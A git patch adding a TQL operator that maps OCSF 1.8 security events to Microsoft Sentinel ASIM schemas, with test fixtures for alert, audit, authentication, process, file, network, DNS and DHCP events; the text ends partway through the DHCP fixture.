From 146507e39c0376b77c333b79e7d1aae6bbaeb323 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Sun, 7 Jun 2026 12:03:08 +0200 Subject: [PATCH 01/27] Add OCSF to ASIM mapper Map the Microsoft OCSF package into the ASIM event\nshapes it already emits, covering alert, audit, authentication,\nprocess, user-management, file, network, DNS, DHCP, and web\nsessions. Add strict failure coverage for unsupported classes and\nkeep the package tests aligned with the new mapper. Assisted-by: GPT-5 (Codex) --- .../unreleased/ocsf-to-asim-mapper.md | 15 + microsoft/operators/ocsf/asim/common.tql | 123 ++++++++ microsoft/operators/ocsf/asim/unsupported.tql | 12 + microsoft/operators/ocsf/map_to_asim.tql | 292 ++++++++++++++++++ microsoft/tests/ocsf-to-asim/alert.tql | 59 ++++ microsoft/tests/ocsf-to-asim/alert.txt | 18 ++ microsoft/tests/ocsf-to-asim/audit.tql | 47 +++ microsoft/tests/ocsf-to-asim/audit.txt | 18 ++ .../tests/ocsf-to-asim/authentication.tql | 120 +++++++ .../tests/ocsf-to-asim/authentication.txt | 48 +++ .../tests/ocsf-to-asim/direct-targets.tql | 163 ++++++++++ .../tests/ocsf-to-asim/direct-targets.txt | 140 +++++++++ microsoft/tests/ocsf-to-asim/process.tql | 56 ++++ microsoft/tests/ocsf-to-asim/process.txt | 19 ++ .../tests/ocsf-to-asim/unsupported-strict.tql | 30 ++ .../tests/ocsf-to-asim/unsupported-strict.txt | 1 + .../tests/ocsf-to-asim/user-management.tql | 86 ++++++ .../tests/ocsf-to-asim/user-management.txt | 38 +++ 18 files changed, 1285 insertions(+) create mode 100644 microsoft/changelog/unreleased/ocsf-to-asim-mapper.md create mode 100644 microsoft/operators/ocsf/asim/common.tql create mode 100644 microsoft/operators/ocsf/asim/unsupported.tql create mode 100644 microsoft/operators/ocsf/map_to_asim.tql create mode 100644 microsoft/tests/ocsf-to-asim/alert.tql create mode 100644 microsoft/tests/ocsf-to-asim/alert.txt create mode 100644 microsoft/tests/ocsf-to-asim/audit.tql create mode 100644 microsoft/tests/ocsf-to-asim/audit.txt create mode 100644 microsoft/tests/ocsf-to-asim/authentication.tql create mode 100644 microsoft/tests/ocsf-to-asim/authentication.txt create mode 100644 microsoft/tests/ocsf-to-asim/direct-targets.tql create mode 100644 microsoft/tests/ocsf-to-asim/direct-targets.txt create mode 100644 microsoft/tests/ocsf-to-asim/process.tql create mode 100644 microsoft/tests/ocsf-to-asim/process.txt create mode 100644 microsoft/tests/ocsf-to-asim/unsupported-strict.tql create mode 100644 microsoft/tests/ocsf-to-asim/unsupported-strict.txt create mode 100644 microsoft/tests/ocsf-to-asim/user-management.tql create mode 100644 microsoft/tests/ocsf-to-asim/user-management.txt diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md new file mode 100644 index 0000000..c7c3730 --- /dev/null +++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md @@ -0,0 +1,15 @@ +--- +title: OCSF to ASIM mapper +type: feature +authors: + - mavam + - codex +created: 2026-06-07T00:00:00Z +--- + +The Microsoft package now includes `microsoft::ocsf::map_to_asim` to convert +validated OCSF 1.8 events into flat Microsoft Sentinel ASIM event records. + +The mapper covers the Microsoft package's current OCSF authentication, process, +audit, user-management, and alert outputs, plus direct OCSF counterparts for +file, network, DNS, DHCP, and web session ASIM schemas. diff --git a/microsoft/operators/ocsf/asim/common.tql b/microsoft/operators/ocsf/asim/common.tql new file mode 100644 index 0000000..60d18d7 --- /dev/null +++ b/microsoft/operators/ocsf/asim/common.tql @@ -0,0 +1,123 @@ +--- +description: Initializes shared ASIM fields from a validated OCSF event. +--- + +asim = {} + +asim.EventCount = 1 +asim.EventStartTime = time +asim.EventEndTime = end_time? else time +asim.EventProduct = metadata?.product?.name? else metadata?.product?.feature?.name? else "Unknown" +asim.EventVendor = metadata?.product?.vendor_name? else "Microsoft" + +if metadata?.original_event_uid? != null { + asim.EventOriginalUid = metadata.original_event_uid + asim.EventUid = metadata.original_event_uid +} +if metadata?.event_code? != null { + asim.EventOriginalType = metadata.event_code +} else { + asim.EventOriginalType = type_uid.string() +} +if message? != null { + asim.EventMessage = message +} + +match severity_id? { + 1 => { + asim.EventSeverity = "Informational" + } + 2 => { + asim.EventSeverity = "Low" + } + 3 => { + asim.EventSeverity = "Medium" + } + 4 => { + asim.EventSeverity = "High" + } + 5 => { + asim.EventSeverity = "High" + asim.EventOriginalSeverity = severity? else "Critical" + } + _ if severity? == "Critical" => { + asim.EventSeverity = "High" + asim.EventOriginalSeverity = severity + } + _ if severity? != null => { + asim.EventSeverity = severity + } + _ => {} +} + +match status? { + "Success" => { + asim.EventResult = "Success" + } + "Failure" => { + asim.EventResult = "Failure" + } + "Partial" => { + asim.EventResult = "Partial" + } + _ => { + match status_id? { + 1 if class_uid != 2003 and class_uid != 2004 and class_uid != 2005 => { + asim.EventResult = "Success" + } + 2 => { + asim.EventResult = "Failure" + } + _ => { + asim.EventResult = "NA" + } + } + } +} +if status_detail? != null { + asim.EventOriginalResultDetails = status_detail +} +if status_code? != null { + asim.EventOriginalResultDetails = status_code.string() +} + +if device?.hostname? != null { + asim.Dvc = device.hostname + asim.DvcHostname = device.hostname + asim.DvcFQDN = device.hostname +} +if device?.uid? != null { + asim.DvcId = device.uid +} +if device?.ip? != null { + asim.DvcIpAddr = device.ip + if asim.Dvc? == null { + asim.Dvc = device.ip.string() + } +} +if asim.Dvc? == null { + asim.Dvc = asim.EventProduct +} + +if disposition? != null { + asim.DvcAction = disposition +} +if action? != null { + asim.DvcAction = action +} + +asim.AdditionalFields = { + category_uid: category_uid?, + category_name: category_name?, + class_uid: class_uid?, + class_name: class_name?, + activity_id: activity_id?, + activity_name: activity_name?, + type_uid: type_uid?, + type_name: type_name?, + metadata: metadata?, + cloud: cloud?, + unmapped: unmapped?, + raw_data: raw_data?, + raw_data_size: raw_data_size?, +} diff --git a/microsoft/operators/ocsf/asim/unsupported.tql b/microsoft/operators/ocsf/asim/unsupported.tql new file mode 100644 index 0000000..fe57184 --- /dev/null +++ b/microsoft/operators/ocsf/asim/unsupported.tql @@ -0,0 +1,12 @@ +--- +description: Drops unsupported OCSF → ASIM mappings with a warning. +--- + +assert false, message={ + reason: "unsupported OCSF to ASIM mapping", + class_uid: class_uid?, + class_name: class_name?, + type_uid: type_uid?, + type_name: type_name?, + name: @name, +} diff --git a/microsoft/operators/ocsf/map_to_asim.tql b/microsoft/operators/ocsf/map_to_asim.tql new file mode 100644 index 0000000..03283d7 --- /dev/null +++ b/microsoft/operators/ocsf/map_to_asim.tql @@ -0,0 +1,292 @@ +--- +description: Validated OCSF 1.8 event → Microsoft Sentinel ASIM event. +--- + +microsoft::ocsf::asim::common + +match class_uid { + 2003 | 2004 => { + @name = "asim.alert_event" + asim.EventSchema = "AlertEvent" + asim.EventSchemaVersion = "0.1" + asim.EventType = "Alert" + asim.EventUid = finding_info?.uid? else metadata?.original_event_uid? + assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + + asim.AlertName = finding_info?.title? else message? + asim.EventReportUrl = finding_info?.url? else null + asim.EventSubType = "Compliance Violation" if class_uid == 2003 else "Threat" + asim.ThreatName = malware?[0]?.name? else finding_info?.title? + asim.ThreatCategory = finding_info?.types?[0]? else compliance?.status? + asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name? + asim.UserId = user?.uid? else actor?.user?.uid? + asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null + match status? { + "New" | "Active" | "In Progress" => { + asim.AlertStatus = "Active" + } + "Resolved" | "Closed" => { + asim.AlertStatus = "Closed" + } + _ => {} + } + asim.AlertOriginalStatus = status? + asim.AlertVerdict = verdict? + } + 1006 | 1008 | 3004 | 201004 => { + @name = "asim.audit_event" + asim.EventSchema = "AuditEvent" + asim.EventSchemaVersion = "0.1.2" + asim.EventType = "Other" + match activity_name { + "Create" => { asim.EventType = "Create" } + "Read" => { asim.EventType = "Read" } + "Update" | "Set" => { asim.EventType = "Set" } + "Delete" => { asim.EventType = "Delete" } + "Execute" => { asim.EventType = "Execute" } + "Install" => { asim.EventType = "Install" } + "Clear" => { asim.EventType = "Clear" } + "Enable" => { asim.EventType = "Enable" } + "Disable" => { asim.EventType = "Disable" } + "Start" => { asim.EventType = "Start" } + "Stop" => { asim.EventType = "Stop" } + _ => {} + } + asim.Operation = activity_name? else type_name? else asim.EventType + asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? + assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + match class_uid { + 1006 => { asim.ObjectType = "Scheduled Task" } + 1008 => { asim.ObjectType = "Event Log" } + 3004 => { asim.ObjectType = "Directory Service Object" } + 201004 => { asim.ObjectType = "Service" } + _ => {} + } + asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? + if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" + } + asim.ActorUserId = actor?.user?.uid? + asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null + asim.SrcIpAddr = src_endpoint?.ip? + asim.TargetHostname = dst_endpoint?.hostname? + asim.TargetIpAddr = dst_endpoint?.ip? + } + 3002 | 3003 => { + @name = "asim.authentication" + asim.EventSchema = "Authentication" + asim.EventSchemaVersion = "0.1.4" + asim.EventType = "Elevate" if class_uid == 3003 else "Logon" + asim.EventSubType = activity_name? + asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? + if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" + } + asim.ActorUserId = actor?.user?.uid? + asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null + asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt? + asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? + if user?.domain? != null and user?.name? != null { + asim.TargetUsername = f"{user.domain}\\{user.name}" + asim.TargetUsernameType = "Windows" + asim.TargetDomain = user.domain + asim.TargetDomainType = "Windows" + } + asim.TargetUserId = user?.uid? + asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null + asim.TargetSessionId = session?.uid? else session?.uid_alt? + asim.SrcIpAddr = src_endpoint?.ip? + asim.SrcHostname = src_endpoint?.hostname? + asim.SrcPortNumber = src_endpoint?.port? + asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname? + asim.TargetAppId = service?.uid? else dst_endpoint?.uid? + asim.TargetAppName = service?.name? else dst_endpoint?.svc_name? + asim.LogonProtocol = auth_protocol? + if auth_factors? != null { + asim.LogonMethod = auth_factors[0]?.factor_type? + } + } + 3001 | 3006 => { + @name = "asim.user_management" + asim.EventSchema = "UserManagement" + asim.EventSchemaVersion = "0.1.2" + asim.EventSeverity = asim.EventSeverity? else "Informational" + asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? + if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" + } + assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + asim.ActorUserId = actor?.user?.uid? + asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null + + if class_uid == 3001 { + match activity_name { + "Create" => { asim.EventType = "UserCreated" } + "Delete" => { asim.EventType = "UserDeleted" } + "Update" => { asim.EventType = "UserModified" } + "Lock" => { asim.EventType = "UserLocked" } + "Unlock" => { asim.EventType = "UserUnlocked" } + "Disable" => { asim.EventType = "UserDisabled" } + "Enable" => { asim.EventType = "UserEnabled" } + "Password Change" => { asim.EventType = "PasswordChanged" } + "Password Reset" => { asim.EventType = "PasswordReset" } + _ => { asim.EventType = "UserModified" } + } + } else { + match activity_name { + "Create" => { asim.EventType = "GroupCreated" } + "Delete" => { asim.EventType = "GroupDeleted" } + "Add User" => { asim.EventType = "UserAddedToGroup" } + "Remove User" => { asim.EventType = "UserRemovedFromGroup" } + "Read" => { asim.EventType = "GroupRead" } + _ => { asim.EventType = "GroupModified" } + } + } + + asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? + if user?.domain? != null and user?.name? != null { + asim.TargetUsername = f"{user.domain}\\{user.name}" + asim.TargetUsernameType = "Windows" + } + asim.TargetUserId = user?.uid? + asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null + asim.GroupName = group?.name? + asim.GroupId = group?.uid? + asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null + asim.SrcIpAddr = src_endpoint?.ip? + asim.SrcHostname = src_endpoint?.hostname? + } + 1007 => { + @name = "asim.process_event" + asim.EventSchema = "ProcessEvent" + asim.EventSchemaVersion = "0.1.4" + match activity_name { + "Launch" => { asim.EventType = "ProcessCreated" } + "Terminate" => { asim.EventType = "ProcessTerminated" } + _ => { microsoft::ocsf::asim::unsupported } + } + asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? + if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" + } + asim.ActorUserId = actor?.user?.uid? + asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null + asim.ActingProcessId = actor?.process?.pid?.string() else process?.parent_process?.pid?.string() else process?.pid?.string() + asim.ParentProcessId = process?.parent_process?.pid?.string() + asim.TargetProcessId = process?.pid?.string() + asim.TargetProcessName = process?.name? else process?.file?.name? else process?.path?.split("\\")[-1] + asim.TargetProcessCommandLine = process?.cmd_line? + asim.TargetUserId = user?.uid? + assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + } + 1001 => { + @name = "asim.file_event" + asim.EventSchema = "FileEvent" + asim.EventSchemaVersion = "0.2.2" + match activity_name { + "Create" => { asim.EventType = "FileCreated" } + "Read" | "Open" => { asim.EventType = "FileAccessed" } + "Update" | "Set Attributes" | "Set Security" => { asim.EventType = "FileModified" } + "Delete" => { asim.EventType = "FileDeleted" } + "Rename" => { asim.EventType = "FileRenamed" } + _ => { asim.EventType = "FileCreatedOrModified" } + } + asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? + if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" + } + asim.ActorUserId = actor?.user?.uid? + asim.TargetFilePath = file?.path? else file?.name? + asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local" + asim.TargetFileName = file?.name? else asim.TargetFilePath?.split("\\")[-1] + asim.SrcFilePath = file_result?.path? + asim.SrcFileName = file_result?.name? + assert asim.ActorUsername != null and asim.TargetFilePath != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + } + 4001 => { + @name = "asim.network_session" + asim.EventSchema = "NetworkSession" + asim.EventSchemaVersion = "0.2.7" + asim.EventType = "NetworkSession" + asim.EventType = "Flow" if activity_name == "Traffic" else asim.EventType + asim.SrcIpAddr = src_endpoint?.ip? + asim.SrcHostname = src_endpoint?.hostname? + asim.SrcPortNumber = src_endpoint?.port? + asim.DstIpAddr = dst_endpoint?.ip? + asim.DstHostname = dst_endpoint?.hostname? + asim.DstPortNumber = dst_endpoint?.port? + asim.SrcBytes = traffic?.bytes_out? + asim.DstBytes = traffic?.bytes_in? + match disposition? { + "Allowed" => { + asim.DvcAction = "Allow" + asim.EventResult = "Success" + } + "Blocked" | "Denied" => { + asim.DvcAction = "Deny" + asim.EventResult = "Failure" + asim.EventSeverity = asim.EventSeverity? else "Low" + } + _ => {} + } + } + 4002 => { + @name = "asim.web_session" + asim.EventSchema = "WebSession" + asim.EventSchemaVersion = "0.2.7" + asim.EventType = "HTTPsession" + asim.Url = url?.url_string? else http_request?.url? + asim.HttpRequestMethod = http_request?.http_method? else http_request?.method? else activity_name?.to_upper() + asim.EventResultDetails = http_response?.code?.string() else status_code?.string() + if http_response?.code? != null { + asim.EventResult = "Success" if http_response.code < 400 else "Failure" + } + assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + } + 4003 => { + @name = "asim.dns" + asim.EventSchema = "Dns" + asim.EventSchemaVersion = "0.1.7" + asim.EventType = activity_name? else "Query" + asim.DnsQuery = query?.name? else query?.hostname? else query?.value? + asim.DnsQueryTypeName = query?.type? else query?.type_name? + asim.DnsQueryClassName = query?.class? else query?.class_name? + asim.EventResultDetails = rcode? else "NA" + asim.SrcIpAddr = src_endpoint?.ip? + asim.SrcHostname = src_endpoint?.hostname? + asim.DstIpAddr = dst_endpoint?.ip? + asim.DstHostname = dst_endpoint?.hostname? + assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + } + 4004 => { + @name = "asim.dhcp_event" + asim.EventSchema = "DhcpEvent" + asim.EventSchemaVersion = "0.1.1" + match activity_name { + "Ack" | "Offer" => { asim.EventType = "Assign" } + "Request" => { asim.EventType = "Renew" } + "Release" => { asim.EventType = "Release" } + _ => { asim.EventType = "Assign" } + } + asim.SrcHostname = src_endpoint?.hostname? else src_endpoint?.ip?.string() + asim.SrcIpAddr = src_endpoint?.ip? + asim.SrcMacAddr = src_endpoint?.mac? else src_endpoint?.mac_addr? + assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + } + 0 | 1002 | 1003 | 1004 | 1005 | 1009 | 1010 | 2001 | 2002 | 2005 | 2006 | 2007 | 2008 | 3005 | 4005 | 4006 | 4007 | 4008 | 4009 | 4010 | 4011 | 4012 | 4013 | 4014 | 5001 | 5002 | 5003 | 5004 | 5006 | 5007 | 5008 | 5009 | 5010 | 5011 | 5012 | 5013 | 5014 | 5015 | 5016 | 5017 | 5018 | 5019 | 5020 | 5021 | 5022 | 5023 | 5040 | 6001 | 6002 | 6003 | 6004 | 6005 | 6006 | 6007 | 6008 | 7001 | 7002 | 7003 | 7004 | 8001 | 8002 => { + microsoft::ocsf::asim::unsupported + } + _ => { + microsoft::ocsf::asim::unsupported + } +} + +this = asim diff --git a/microsoft/tests/ocsf-to-asim/alert.tql b/microsoft/tests/ocsf-to-asim/alert.tql new file mode 100644 index 0000000..81c83a0 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/alert.tql @@ -0,0 +1,59 @@ +from { + activity_id: 1, + activity_name: "Create", + attacks: [ + { + technique: { + uid: "T1059", + }, + }, + ], + category_uid: 2, + category_name: "Findings", + class_uid: 2004, + class_name: "Detection Finding", + type_uid: 200401, + type_name: "Detection Finding: Create", + time: 2026-05-01T10:10:00Z, + end_time: 2026-05-01T10:12:00Z, + severity_id: 4, + severity: "High", + status_id: 1, + status: "New", + verdict: "True Positive", + metadata: { + log_name: "security/alerts_v2", + original_event_uid: "alert-1", + product: { + name: "Microsoft Defender", + vendor_name: "Microsoft", + feature: { + name: "Microsoft Graph", + }, + }, + profiles: ["cloud", "incident", "security_control"], + tenant_uid: "11111111-1111-1111-1111-111111111111", + version: "1.8.0", + }, + cloud: { + provider: "Azure", + }, + finding_info: { + uid: "alert-1", + title: "Suspicious PowerShell", + desc: "PowerShell launched with suspicious arguments.", + types: ["malware"], + }, + malware: [ + { + name: "Trojan", + }, + ], +} +@name = "ocsf.detection_finding" +microsoft::ocsf::map_to_asim +name = @name +select name, EventSchema, EventSchemaVersion, EventType, EventUid, + EventSeverity, EventOriginalUid, EventProduct, EventVendor, AlertName, + EventSubType, ThreatName, ThreatCategory, AlertStatus, + AlertOriginalStatus, AlertVerdict diff --git a/microsoft/tests/ocsf-to-asim/alert.txt b/microsoft/tests/ocsf-to-asim/alert.txt new file mode 100644 index 0000000..c8358c3 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/alert.txt @@ -0,0 +1,18 @@ +{ + name: "asim.alert_event", + EventSchema: "AlertEvent", + EventSchemaVersion: "0.1", + EventType: "Alert", + EventUid: "alert-1", + EventSeverity: "High", + EventOriginalUid: "alert-1", + EventProduct: "Microsoft Defender", + EventVendor: "Microsoft", + AlertName: "Suspicious PowerShell", + EventSubType: "Threat", + ThreatName: "Trojan", + ThreatCategory: "malware", + AlertStatus: "Active", + AlertOriginalStatus: "New", + AlertVerdict: "True Positive", +} diff --git a/microsoft/tests/ocsf-to-asim/audit.tql b/microsoft/tests/ocsf-to-asim/audit.tql new file mode 100644 index 0000000..d1e4325 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/audit.tql @@ -0,0 +1,47 @@ +from { + activity_id: 1, + activity_name: "Clear", + category_uid: 1, + category_name: "System Activity", + class_uid: 1008, + class_name: "Event Log Activity", + type_uid: 100801, + type_name: "Event Log Activity: Clear", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 4, + severity: "High", + metadata: { + event_code: "1102", + log_name: "Security", + original_event_uid: "99001", + product: { + name: "Microsoft-Windows-Eventlog", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "WINHOST01.corp.local", + }, + actor: { + process: { + pid: 4660, + }, + session: { + uid_alt: "0xA1B2C3", + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, +} +@name = "ocsf.event_log_activity" +microsoft::ocsf::map_to_asim +name = @name +select name, EventSchema, EventSchemaVersion, EventType, EventResult, + EventSeverity, EventOriginalType, Dvc, DvcHostname, Object, ObjectType, + Operation, ActorUsername, ActorUsernameType, ActorUserId, + ActorUserIdType diff --git a/microsoft/tests/ocsf-to-asim/audit.txt b/microsoft/tests/ocsf-to-asim/audit.txt new file mode 100644 index 0000000..e9f470c --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/audit.txt @@ -0,0 +1,18 @@ +{ + name: "asim.audit_event", + EventSchema: "AuditEvent", + EventSchemaVersion: "0.1.2", + EventType: "Clear", + EventResult: "NA", + EventSeverity: "High", + EventOriginalType: "1102", + Dvc: "WINHOST01.corp.local", + DvcHostname: "WINHOST01.corp.local", + Object: "Security", + ObjectType: "Event Log", + Operation: "Clear", + ActorUsername: "CORP\\jdoe", + ActorUsernameType: "Windows", + ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + ActorUserIdType: "SID", +} diff --git a/microsoft/tests/ocsf-to-asim/authentication.tql b/microsoft/tests/ocsf-to-asim/authentication.tql new file mode 100644 index 0000000..e0cfa9f --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/authentication.tql @@ -0,0 +1,120 @@ +from { + activity_id: 1, + activity_name: "Logon", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3002, + class_name: "Authentication", + type_uid: 300201, + type_name: "Authentication: Logon", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + auth_protocol: "Kerberos", + metadata: { + event_code: "4624", + original_event_uid: "98761", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + src_endpoint: { + ip: 10.0.0.42, + port: 49827, + }, + actor: { + user: { + uid: "S-1-0-0", + }, + session: { + uid_alt: "0x0", + }, + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, +}, { + activity_id: 1, + activity_name: "Logon", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3002, + class_name: "Authentication", + type_uid: 300201, + type_name: "Authentication: Logon", + time: 2026-05-01T10:00:00Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + metadata: { + log_name: "auditLogs/signIns", + original_event_uid: "sign-in-1", + product: { + name: "Microsoft Entra ID", + vendor_name: "Microsoft", + feature: { + name: "Microsoft Graph", + }, + }, + profiles: ["cloud", "security_control"], + version: "1.8.0", + }, + cloud: { + provider: "Azure", + }, + actor: { + user: { + domain: "example.com", + email_addr: "alice@example.com", + full_name: "Alice Example", + name: "alice", + uid: "user-1", + }, + }, + user: { + domain: "example.com", + email_addr: "alice@example.com", + full_name: "Alice Example", + name: "alice", + uid: "user-1", + }, + src_endpoint: { + ip: 203.0.113.10, + uid: "device-1", + }, + dst_endpoint: { + svc_name: "Microsoft Graph", + uid: "resource-1", + }, + service: { + name: "Office 365", + uid: "app-1", + }, + auth_factors: [ + { + factor_type: "Push Notification", + factor_type_id: 5, + }, + ], +} +@name = "ocsf.authentication" +microsoft::ocsf::map_to_asim +name = @name +sort EventOriginalUid +select name, EventSchema, EventSchemaVersion, EventType, EventResult, + EventSeverity, EventProduct, EventVendor, EventOriginalType, + EventOriginalUid, Dvc, DvcHostname=DvcHostname?, SrcIpAddr, SrcPortNumber, + TargetUsername, TargetUsernameType, TargetUserId, TargetUserIdType, + TargetAppName=TargetAppName?, TargetAppId=TargetAppId?, + LogonProtocol=LogonProtocol?, LogonMethod=LogonMethod? diff --git a/microsoft/tests/ocsf-to-asim/authentication.txt b/microsoft/tests/ocsf-to-asim/authentication.txt new file mode 100644 index 0000000..65c3ba5 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/authentication.txt @@ -0,0 +1,48 @@ +{ + name: "asim.authentication", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + EventResult: "Success", + EventSeverity: "Informational", + EventProduct: "Microsoft-Windows-Security-Auditing", + EventVendor: "Microsoft", + EventOriginalType: "4624", + EventOriginalUid: "98761", + Dvc: "DC01.corp.local", + DvcHostname: "DC01.corp.local", + SrcIpAddr: 10.0.0.42, + SrcPortNumber: 49827, + TargetUsername: "CORP\\jdoe", + TargetUsernameType: "Windows", + TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + TargetUserIdType: "SID", + TargetAppName: null, + TargetAppId: null, + LogonProtocol: "Kerberos", + LogonMethod: null, +} +{ + name: "asim.authentication", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + EventResult: "Success", + EventSeverity: "Informational", + EventProduct: "Microsoft Entra ID", + EventVendor: "Microsoft", + EventOriginalType: "300201", + EventOriginalUid: "sign-in-1", + Dvc: "Microsoft Entra ID", + DvcHostname: null, + SrcIpAddr: 203.0.113.10, + SrcPortNumber: null, + TargetUsername: "example.com\\alice", + TargetUsernameType: "Windows", + TargetUserId: "user-1", + TargetUserIdType: null, + TargetAppName: "Office 365", + TargetAppId: "app-1", + LogonProtocol: null, + LogonMethod: "Push Notification", +} diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.tql b/microsoft/tests/ocsf-to-asim/direct-targets.tql new file mode 100644 index 0000000..e616aef --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/direct-targets.tql @@ -0,0 +1,163 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, +}, { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, +}, { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + name: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, +}, { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: 